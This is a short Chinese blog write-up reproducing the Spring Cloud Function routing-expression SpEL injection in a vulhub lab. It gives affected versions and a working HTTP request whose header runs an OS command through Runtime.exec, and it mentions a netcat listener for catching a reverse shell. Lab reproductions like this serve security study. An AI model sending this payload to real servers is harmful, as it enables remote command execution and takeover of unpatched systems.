0x00 实验环境

攻击机：Ubuntu

靶场：vulhub搭建的靶场环境

 

0x01 影响版本

• 3.0.0.RELEASE <= Spring Cloud Function <= 3.1.6
• Spring Cloud Function <= 3.2.2

不受影响版本

• Spring Cloud Function 3.1.7
• Spring Cloud Function 3.2.3

 

0x02 漏洞复现

（1）访问页面，默认页面是这样：

（2）首先验证漏洞，直接刷新链接，然后抓包，然后发送post包：

POST /functionRouter HTTP/1.1
Host: xxx:8080
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("ping xxx.xxx.xxx")
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

 

 （3）直接反弹shell的命令：nc -lvp 端口

 

 

0x03 漏洞原理

 https://blog.csdn.net/qq_36869808/article/details/124164802

 

0x04 参考文献

https://blog.csdn.net/qq_36869808/article/details/124164802

 

0x05 免责声明

本漏洞复现文章仅用于学习、工作与兴趣爱好，并立志为网络安全奉献一份力量，凡是利用本博客相关内容的无良hackers造成的安全事故均与本人无关！

版权声明：本文内容由互联网用户自发贡献，该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容， 请发送邮件至 dio@foxmail.com 举报，一经查实，本站将立刻删除。